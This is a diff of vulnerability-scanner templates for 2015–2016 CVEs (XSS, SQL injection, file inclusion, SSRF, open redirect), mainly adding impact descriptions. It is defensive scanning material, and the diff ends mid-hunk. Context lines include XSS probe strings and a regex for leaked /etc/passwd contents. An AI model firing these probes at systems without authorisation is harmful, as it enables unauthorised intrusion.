\ No newline at end of file
diff --git a/http/cves/2015/CVE-2015-6477.yaml b/http/cves/2015/CVE-2015-6477.yaml
index 9e793e0ec9..64952bb66a 100644
--- a/http/cves/2015/CVE-2015-6477.yaml
+++ b/http/cves/2015/CVE-2015-6477.yaml
@@ -5,6 +5,8 @@ info:
   author: geeknik
   severity: medium
   description: Nordex NC2 contains a cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Upgrade to the latest version to mitigate this vulnerability.
   reference:
@@ -45,4 +47,4 @@ http:
         part: body
         words:
           - "</script><script>alert('{{randstr}}')</script>"
-# digest: 4a0a00473045022043530c0184abc2792e3af8fc479539f017ca978eebdbe5a1bf858693e6f14dbe02210099c5c6756391b1324369d55ba437370cbb4b803b9a85b36915a6397f67c83cc2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022044eba42cf442a5583667dc633afc18523d523e9bc838b8ec07de78b9af8157c30221009a7c8b3a0d3b9b7e74be4bd27efff6532d13bb79e5d517143d2950d6e42445b8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2015/CVE-2015-6544.yaml b/http/cves/2015/CVE-2015-6544.yaml
index d5681ede8e..7bf5e10d20 100644
--- a/http/cves/2015/CVE-2015-6544.yaml
+++ b/http/cves/2015/CVE-2015-6544.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Combodo iTop before 2.2.0-2459 contains a cross-site scripting vulnerability in application/dashboard.class.inc.php which allows remote attackers to inject arbitrary web script or HTML via a dashboard title.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Upgrade to a version of Combodo iTop that is equal to or greater than 2.2.0-2459 to mitigate this vulnerability.
   reference:
@@ -47,4 +49,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100bc8de41899e22fb4529e5f8036e0f9a45be5bfda585d871ebe6966cf01576f89022100ff10621d331f8425b8d221ed5ed66a95f5bec4e93fc3afa374588c1c707079ca:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a004630440220310c1c3dfb4685981d2b8c0570a3f51205d1351f4525cfd108b5ff0748ce19be02204ffe64131139eccc3836198c27ddd7893e36df632591eecf10449664efd31e5d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2015/CVE-2015-7245.yaml b/http/cves/2015/CVE-2015-7245.yaml
index b5204dc734..146702ec93 100644
--- a/http/cves/2015/CVE-2015-7245.yaml
+++ b/http/cves/2015/CVE-2015-7245.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     D-Link DVG-N5402SP is susceptible to local file inclusion in products with firmware W1000CN-00, W1000CN-03, or W2000EN-00. A remote attacker can read sensitive information via a .. (dot dot) in the errorpage parameter.
+  impact: |
+    An attacker can read sensitive files on the system, potentially leading to unauthorized access or disclosure of sensitive information.
   remediation: |
     Update the router firmware to the latest version, which includes a fix for the local file inclusion vulnerability.
   reference:
@@ -39,4 +41,4 @@ http:
         part: body
         regex:
           - "root:.*:0:0:"
-# digest: 4a0a00473045022100ca5a964ea92b5133af89df4f5f346221863a9ac3c003cf5dece99f434557379a02203e9392edd5f8366ef41816ad1e5a43ecab6d0e8a4abd0f4fd197faca43f2772c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402203abeb57842f305284c476cd3bfb05e352077b601b6e9e4f5a9eb23dc3c398a9502207caf3104651203f61f563fca8c2cadf99730190441457b4af63a1de2d4718f33:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2015/CVE-2015-7297.yaml b/http/cves/2015/CVE-2015-7297.yaml
index aac8c6f54d..0344b55a05 100644
--- a/http/cves/2015/CVE-2015-7297.yaml
+++ b/http/cves/2015/CVE-2015-7297.yaml
@@ -5,6 +5,8 @@ info:
   author: princechaddha
   severity: high
   description: A SQL injection vulnerability in Joomla! 3.2 before 3.4.4 allows remote attackers to execute arbitrary SQL commands.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the Joomla! CMS.
   remediation: |
     Apply the latest security patches and updates provided by Joomla! to mitigate the SQL Injection vulnerability.
   reference:
@@ -39,5 +41,4 @@ http:
         part: body
         words:
           - '{{md5({{num}})}}'
-
-# digest: 490a0046304402207559b85ceccbea1fe5b6daceae4e5a92557d4633810feb726625a5b886a65f02022069bdfd3c858ad721a570c03085f038c7e7d3bcff7ffc28725f22d3beac6634c4:922c64590222798bb761d5b6d8e72950
+# digest: 490a0046304402204bc8735ec8f8afb7429176b142c6a80118e7d9d94f5aeedbf56c3c06761a7d7e0220747662ec9a9a70c4f9a152965d1e50b530c582095b03199fbb2f6203a490f0cd:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2015/CVE-2015-7377.yaml b/http/cves/2015/CVE-2015-7377.yaml
index d250b6a986..771ee13d37 100644
--- a/http/cves/2015/CVE-2015-7377.yaml
+++ b/http/cves/2015/CVE-2015-7377.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: WordPress Pie Register before 2.0.19 contains a reflected cross-site scripting vulnerability in pie-register/pie-register.php which allows remote attackers to inject arbitrary web script or HTML via the invitaion_code parameter in a pie-register page to the default URL.
+  impact: |
+    Successful exploitation of this vulnerability could lead to the execution of arbitrary script code in the context of the affected website, potentially allowing an attacker to steal sensitive information or perform unauthorized actions.
   remediation: |
     Update to the latest version of the WordPress Pie-Register plugin (2.0.19 or higher) to mitigate this vulnerability.
   reference:
@@ -48,4 +50,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100deaed4c302a0f2dbb2c1002ab16a4d19abed5bf2b5498076e487f09d442f1aa90221009c6e5e7a2bea16706c8fe80fc4953b8c41ba71a439584421f740f40dcb0d54e0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502210081857604c1c23099850e1b7fa5861629a4f39915a4937ec058b69f45c97c36a40220045b828831fa6658df8f2fb9d2ea668a85595319c861368f5edef8b3813c2e2a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2015/CVE-2015-7450.yaml b/http/cves/2015/CVE-2015-7450.yaml
index 9f1d853224..1cb19dce20 100644
--- a/http/cves/2015/CVE-2015-7450.yaml
+++ b/http/cves/2015/CVE-2015-7450.yaml
@@ -5,6 +5,8 @@ info:
   author: wdahlenb
   severity: critical
   description: IBM Websphere Application Server 7, 8, and 8.5 have a deserialization vulnerability in the SOAP Connector (port 8880 by default).
+  impact: |
+    Successful exploitation of this vulnerability can lead to remote code execution, allowing an attacker to execute arbitrary code on the affected system.
   remediation: |
     Apply the latest security patches provided by IBM to mitigate this vulnerability.
   reference:
@@ -66,4 +68,4 @@ http:
       - type: status
         status:
           - 500
-# digest: 4a0a00473045022068c38cca57a3b099c3c2650747e11cc02ea8a32b4bef8b3c1107cc3673d74ae4022100a2e6b20a156826cef3f1629c28619f37163a34c630e9eaabef9621ffdc700255:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502203dddf0bafc4daa4c2ac834309b39790c5dcb190efc315b734735e8e33cbc7a46022100e8601b832ddecb341582c7f50441a5a9d2f6431a0961563e8b8a26cdd06096a9:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2015/CVE-2015-7780.yaml b/http/cves/2015/CVE-2015-7780.yaml
index b4011cd014..da2916da95 100644
--- a/http/cves/2015/CVE-2015-7780.yaml
+++ b/http/cves/2015/CVE-2015-7780.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: ManageEngine Firewall Analyzer before 8.0 is vulnerable to local file inclusion.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the target system, potentially leading to unauthorized access or information disclosure.
   remediation: |
     Upgrade to a version of ManageEngine Firewall Analyzer that is equal to or greater than 8.0 to mitigate this vulnerability.
   reference:
@@ -48,4 +50,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a004730450220555781e07f970daadcced951247ac399438d40da4bd3a346f2db1d49889d564c022100f50acf83d34cecd1dfe04461ce384c9cf4b84d28e6409905b991c68ab1138d5f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100fe814cfbdea5dd48bb42e2916cc5baef7da4bdf5e09ba2ae4aec2d64f810bf3b02206c07736bfd5e351b96f0349cbb22c014ffbe9162ed348e4e870f21ef115c3440:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2015/CVE-2015-7823.yaml b/http/cves/2015/CVE-2015-7823.yaml
index f6795a8dd4..35513fc5fe 100644
--- a/http/cves/2015/CVE-2015-7823.yaml
+++ b/http/cves/2015/CVE-2015-7823.yaml
@@ -5,6 +5,8 @@ info:
   author: 0x_Akoko
   severity: medium
   description: Kentico CMS 8.2 contains an open redirect vulnerability via GetDocLink.ashx with link variable. An attacker can construct a URL within the application that causes a redirection to an arbitrary external domain.
+  impact: |
+    An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the installation of malware.
   remediation: |
     Apply the latest security patches or upgrade to a newer version of Kentico CMS.
   reference:
@@ -35,4 +37,4 @@ http:
         part: header
         regex:
           - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
-# digest: 4a0a00473045022100db5777794e9cca266ff56c560d0dc85b120621d3fd9d010b90952ebcff00d0f4022039a5b85b02725e298df42dfae8d92e2ebcd7c782b0726a622beea288a97ce891:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402203936d5c04ccb084917aa0e7732778dd55d5b782335998b15f96a978bba1d027b022057d23d7f269f703081b3594cca15810556c0bd1861f20f113211c56cb6019eda:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2015/CVE-2015-8349.yaml b/http/cves/2015/CVE-2015-8349.yaml
index 54b80ebbda..0a55d8cd36 100644
--- a/http/cves/2015/CVE-2015-8349.yaml
+++ b/http/cves/2015/CVE-2015-8349.yaml
@@ -5,6 +5,8 @@ info:
   author: pikpikcu
   severity: medium
   description: SourceBans before 2.0 contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML via the advSearch parameter to index.php.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Upgrade to a version of SourceBans that is 2.0 or above, which includes a fix for this vulnerability.
   reference:
@@ -44,4 +46,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022061874dc0e815a33d631d7209c6fcf76328d7f5ed53541b56230fb149770bb80b022100a19e536561a918832285df3e55075fd6f54a5a157eca5094efc0ebe7de24f638:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022026a6c55a1c3ebeb2ab255f6b5b005c4fe12d2bf1e489ae7b2d7035a2acec98fb02206fa88dfe1cc100390aaff97cb554e3b4cd8f6fac1ae7e8ef68b6aa1e91eb8ba3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2015/CVE-2015-8399.yaml b/http/cves/2015/CVE-2015-8399.yaml
index f4f1ff66d7..66975ca9e6 100644
--- a/http/cves/2015/CVE-2015-8399.yaml
+++ b/http/cves/2015/CVE-2015-8399.yaml
@@ -5,6 +5,8 @@ info:
   author: princechaddha
   severity: medium
   description: Atlassian Confluence before 5.8.17 contains an information disclsoure vulnerability. A remote authenticated user can read configuration files via the decoratorName parameter to (1) spaces/viewdefaultdecorator.action or (2) admin/viewdefaultdecorator.action.
+  impact: |
+    An attacker can exploit this vulnerability to gain access to sensitive information.
   remediation: |
     Upgrade to a version higher than 5.8.17 to mitigate the vulnerability.
   reference:
@@ -43,4 +45,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100ac9a4f3e70c868866671e851df0b9fc3bf4492f1aadfac4a904600e976812ebe022100a7307ba3c92d9659c61ff4ebde1140aadd30cfafc8b4d717da60d663afa15e3f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450221008ea8314c2d2cfc813305b31af831f56fdab3971ec12350cbbd7dc158862e6d9b02202a754b1017d82f6c512bee0b31c7e2198a141e38147a4b5eba9341544d824a89:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2015/CVE-2015-8813.yaml b/http/cves/2015/CVE-2015-8813.yaml
index c455f41547..f31ce86d95 100644
--- a/http/cves/2015/CVE-2015-8813.yaml
+++ b/http/cves/2015/CVE-2015-8813.yaml
@@ -5,6 +5,8 @@ info:
   author: emadshanab
   severity: high
   description: Umbraco before version 7.4.0 contains a server-side request forgery vulnerability in feedproxy.aspx that allows attackers to send arbitrary HTTP GET requests via http://local/Umbraco/feedproxy.aspx?url=http://127.0.0.1:80/index.
+  impact: |
+    The vulnerability can result in unauthorized access to sensitive information or systems, leading to potential data breaches or further exploitation.
   remediation: |
     Upgrade Umbraco to version 7.4.0 or above to mitigate the vulnerability and apply any necessary patches or security updates.
   reference:
@@ -37,4 +39,4 @@ http:
         part: interactsh_protocol # Confirms the HTTP Interaction
         words:
           - "http"
-# digest: 4a0a0047304502204b6fcb6a771fd3b7b96a1538f683f81e0e7b25b821053881642d48e7b9d37958022100f8be5a511110ca7df0a2f7f32001a3544bc3f34c3d7a1b326ecbd5f84315d138:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100d6c0f97e8ec2b3d306799b9c831fbd7e715d7bb71cafde7ed2a944c60bba1547022100d0bf5406fd6d80cacdf520983912aafba198b629392fe64d7ea723e40997d3e1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2015/CVE-2015-9312.yaml b/http/cves/2015/CVE-2015-9312.yaml
index dca645a642..87d5493831 100644
--- a/http/cves/2015/CVE-2015-9312.yaml
+++ b/http/cves/2015/CVE-2015-9312.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     WordPress NewStatPress plugin through 1.0.4 contains a cross-site scripting vulnerability. The plugin utilizes, on lines 28 and 31 of the file "includes/nsp_search.php", several variables from the $_GET scope without sanitation. While WordPress automatically escapes quotes on this scope, the outputs on these lines are outside of quotes, and as such can be utilized to initiate a cross-site scripting attack.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected website, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: Fixed in version 1.0.6
   reference:
     - https://wpscan.com/vulnerability/46bf6c69-b612-4aee-965d-91f53f642054
@@ -47,4 +49,4 @@ http:
           - 'contains(body_2, "<img src=x onerror=alert(document.domain)")'
           - 'contains(body_2, "newstatpress")'
         condition: and
-# digest: 4a0a004730450220718e7bed9d295d0adb5af09daf590a18cf792d3c7b95035a2b2bf23795759fd7022100ecc84b3007ebe99ffaf21d95db52adf8a6786c4f5b5a67bbd46ab13aafe5d57b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022017f0d3a5be3709ef64bdfcca1477adfb95b2c4217df5cb89259452268686186c0220430ce1c43d5fc82a5e2d8f3357f24eaa20921736d0e9f431539d6fc51a6f5a57:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2015/CVE-2015-9323.yaml b/http/cves/2015/CVE-2015-9323.yaml
index 71c2c2d3df..a9938e4a4b 100644
--- a/http/cves/2015/CVE-2015-9323.yaml
+++ b/http/cves/2015/CVE-2015-9323.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     The 404 to 301 – Redirect, Log and Notify 404 Errors WordPress plugin was affected by an Authenticated Blind SQL Injection security vulnerability.
+  impact: |
+    Successful exploitation of this vulnerability could lead to unauthorized access, data leakage, or potential compromise of the WordPress site.
   remediation: Fixed in version 2.0.3
   reference:
     - https://wpscan.com/vulnerability/61586816-dd2b-461d-975f-1989502affd9
@@ -48,4 +50,4 @@ http:
           - 'contains(content_type, "text/html")'
           - 'contains(body, "404-to-301")'
         condition: and
-# digest: 4b0a00483046022100a5e57c3091dfe2943108ce10a30a2dbcb1442a8b42ed28b3f4f334ec65d90ef4022100b82c56f8c6b60090ca3dc56e3c6ba080f214383cb118aa5fcbf768f1247a0638:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100b4d2e2ebfccd89bce918cf6b82890dc081ef6fc2810475e962b1d42ad1d660700220365c6d8a9b202201389eca3687a442b57abc62ec85356753ab8c7d2fa80430c9:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2015/CVE-2015-9414.yaml b/http/cves/2015/CVE-2015-9414.yaml
index 423078a898..c4151cffce 100644
--- a/http/cves/2015/CVE-2015-9414.yaml
+++ b/http/cves/2015/CVE-2015-9414.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: WordPress Symposium through 15.8.1 contains a reflected cross-site scripting vulnerability via the wp-content/plugins/wp-symposium/get_album_item.php?size parameter which allows an attacker to steal cookie-based authentication credentials and launch other attacks.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions.
   remediation: |
     Update to the latest version of the WordPress Symposium plugin (>=15.8.2) which includes a fix for this vulnerability.
   reference:
@@ -48,4 +50,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100ed3a28e5d66276da789f99d8ca9b619f5ce94b14fdc55c680e75ec6768b884770220253d900494d9dfdd178a4a569645ab718f34afd497909a342be705b28d49459b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022063ac8e68321f0e59b6c100c24937f8b6d9917f59ad32a62aeb85628a938a35d1022100febf34a80956f896e92a34a6621d0864d007f57f563cf8d29d36fab8bf26eefa:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2015/CVE-2015-9480.yaml b/http/cves/2015/CVE-2015-9480.yaml
index 6547281c59..c0797ed689 100644
--- a/http/cves/2015/CVE-2015-9480.yaml
+++ b/http/cves/2015/CVE-2015-9480.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: high
   description: The RobotCPA plugin 5 for WordPress has directory traversal via the f.php l parameter.
+  impact: |
+    An attacker can access sensitive files on the server, potentially leading to unauthorized access, data leakage, or further exploitation.
   remediation: |
     Update to the latest version of the WordPress RobotCPA 5 plugin to fix the directory traversal vulnerability.
   reference:
@@ -41,4 +43,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100aa181dcf292d27b35328015346bc88bfd840fb7df3fb9abee95f6f9dd9c98f05022100b3fbed3118362f5a547600472d9ba3e45f3c3ffa5c0fb9f7a3c0c430344d2090:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502205a874d0e455f00e2607b17addc35d151c68d78a8f1e374cfb6ccafe6deaf341b022100ea6b0959efe3a2c6abc9fe27bcc3f76b54c4309d9ca84e698a47c2e30219edcf:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2016/CVE-2016-0957.yaml b/http/cves/2016/CVE-2016-0957.yaml
index 29c19cc718..ef1928e067 100644
--- a/http/cves/2016/CVE-2016-0957.yaml
+++ b/http/cves/2016/CVE-2016-0957.yaml
@@ -5,6 +5,8 @@ info:
   author: geeknik
   severity: high
   description: Dispatcher before 4.1.5 in Adobe Experience Manager 5.6.1, 6.0.0, and 6.1.0 does not properly implement a URL filter, which allows remote attackers to bypass dispatcher rules via unspecified vectors.
+  impact: |
+    The vulnerability allows attackers to bypass security rules and potentially gain unauthorized access to sensitive information or perform malicious actions.
   remediation: |
     Upgrade to Adobe AEM Dispatcher version 4.15 or higher to fix the vulnerability.
   reference:
@@ -45,4 +47,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a00463044022002d920ff6f08e0f17252e3a988907269caa75878d2fc2be1c69854dd2c27f920022068e782b1558b398fbadac0cf36ed888391e0a03b412daf029f4fb398ae6a3484:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022077556d3daf7be24aed5c059d57a9f9a8a7c56fc624bcd8843d49851236eeeb4802210082038feeeaca95b060232fae3f97608dc0d16a75de22429a02dcbe44556d11b5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2016/CVE-2016-1000126.yaml b/http/cves/2016/CVE-2016-1000126.yaml
index 7b70a1db9c..68d9de176d 100644
--- a/http/cves/2016/CVE-2016-1000126.yaml
+++ b/http/cves/2016/CVE-2016-1000126.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: WordPress Admin Font Editor 1.8 and before contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+  impact: |
+    This vulnerability allows an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Update to the latest version of the WordPress Admin Font Editor plugin (1.8 or higher) to fix this vulnerability.
   reference:
@@ -47,4 +49,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100dc5982de87916754cffd53a28bf0cd0aaeabe19f26be4f32b75da2238455f99a0221009fe74fca64b9608b20ba87bb2011884a5a8c0aafd033b809f301d60f3784dad1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502202c66731b5f9f2d6e188f0477f7c2b51f24e3acec8a07d6d5d004bbe4d5c2eca50221008ba04978d14a05686641052aceb766494413d1058343554156118ef309ca0fb1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2016/CVE-2016-1000127.yaml b/http/cves/2016/CVE-2016-1000127.yaml
index 8a84cc9fa4..893efd080d 100644
--- a/http/cves/2016/CVE-2016-1000127.yaml
+++ b/http/cves/2016/CVE-2016-1000127.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: WordPress AJAX Random Post 2.00 is vulnerable to reflected cross-site scripting.
+  impact: |
+    This vulnerability allows an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Update to the latest version of the WordPress AJAX Random Post plugin (2.00 or higher) to fix this issue.
   reference:
@@ -46,4 +48,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502210094ae3f7ce1f4aad567382cdc6f3f62952f86e336e7f0da1db305b2bc62cb7a5102204b1f96fdfb57f9e17aec329ec72acb333c1c71fa4b991ead58286b01c4d63452:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a0048304602210081771e4363603f58a328b1a6bacde242da4c5e3271025be6c7c987935d3b2f8f0221009bab57ab2790b4596b9def71ae18a5e91ce2ff4f751c495781179b1b22c6ee49:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2016/CVE-2016-1000129.yaml b/http/cves/2016/CVE-2016-1000129.yaml
index dad36daacd..30271e72e5 100644
--- a/http/cves/2016/CVE-2016-1000129.yaml
+++ b/http/cves/2016/CVE-2016-1000129.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: WordPress defa-online-image-protector 3.3 and before contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Update to the latest version of the WordPress defa-online-image-protector plugin (version 3.3 or higher) to mitigate this vulnerability.
   reference:
@@ -47,4 +49,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502201f425b2687c1d86ba6e2c4a4a0a2db98563703cd47a62ff79615c2cc9f344778022100a1231eb16bcf608c502af4b99c6eb5fb23c6ccb318f4f4d44ac70c24e017120e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100b69848f928f3b5acb72d8906a014a75d284b4dbc0a104129bf55f461059f6273022100dc0138ac2c42489e8daf4a59615eee32f5fab18694177535c56572991cdf0314:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2016/CVE-2016-1000130.yaml b/http/cves/2016/CVE-2016-1000130.yaml
index 4d9162cf40..698bd404f1 100644
--- a/http/cves/2016/CVE-2016-1000130.yaml
+++ b/http/cves/2016/CVE-2016-1000130.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: Wordpress plugin e-search 1.0 and before contains a cross-site scripting vulnerability via date_select.php which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions.
   remediation: |
     Update to the latest version of the WordPress e-search plugin to mitigate this vulnerability.
   reference:
@@ -47,4 +49,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a00463044022073541e0a6c76f9af169a47d28858837a0e51ac07acfbb890faa2b2893f2adcbf02205b66d4d20c26828be7b99d23f206856dffa8d0975d5d248ebaf073f6d9be3801:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100b3f3052db89c469ebb7e5bf863db68d5e8e7fe80d90fc1c0f8dc3cc715336c3b022100bef97bf4611b9e08cd2f0a28a1a86f102823928ec996f87e46570887b838f5c3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2016/CVE-2016-1000131.yaml b/http/cves/2016/CVE-2016-1000131.yaml
index 1040f8041c..b49765daf5 100644
--- a/http/cves/2016/CVE-2016-1000131.yaml
+++ b/http/cves/2016/CVE-2016-1000131.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: WordPress e-search 1.0 and before contains a reflected cross-site scripting vulnerability via title_az.php which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.
   remediation: |
     Update to the latest version of the WordPress e-search plugin to mitigate this vulnerability.
   reference:
@@ -47,4 +49,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100a54604ad1849342732032772e2466eb797c0236806da4d25bb6bf46020c16dcc022100b0dd7ad3bf9f8afe92ccc684c0a85b238cef807a53469c3668d7eedae0b6a2bd:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a004630440220241a63c9c5e797de6b9bcc7368de88c3fbc3b985e604f8760756b49756f9898602206c2549634b8db91009b856937616f849ad8ac2303e9a5c751a142ee6f8bf3381:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2016/CVE-2016-1000132.yaml b/http/cves/2016/CVE-2016-1000132.yaml
index 652831c4c4..d3580c2873 100644
--- a/http/cves/2016/CVE-2016-1000132.yaml
+++ b/http/cves/2016/CVE-2016-1000132.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: WordPress enhanced-tooltipglossary 3.2.8 contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.
   remediation: |
     Update to the latest version of WordPress enhanced-tooltipglossary plugin (3.2.9 or higher) which includes a fix for this vulnerability.
   reference:
@@ -47,4 +49,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022000c0e22769e84c65dfa64145d9175b7ded785b7466f62b66110e9461b39ef8bc022100be40690186849ce2ea1185a7ee3b9e3f893005501f1141bad6fda92722aef054:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100c43fae980722bc0ef85637f20f428fd05c6c010f8b8ca0404fc2de751cf9eedf02207a21d277e19e661c0eeb806c43e4226619738ac106e3e897521e3ef75a50cca4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2016/CVE-2016-1000133.yaml b/http/cves/2016/CVE-2016-1000133.yaml
index 887de20937..f68ea329e6 100644
--- a/http/cves/2016/CVE-2016-1000133.yaml
+++ b/http/cves/2016/CVE-2016-1000133.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: Wordpress plugin forget-about-shortcode-buttons 1.1.1 contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+  impact: |
+    Allows attackers to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions.
   remediation: |
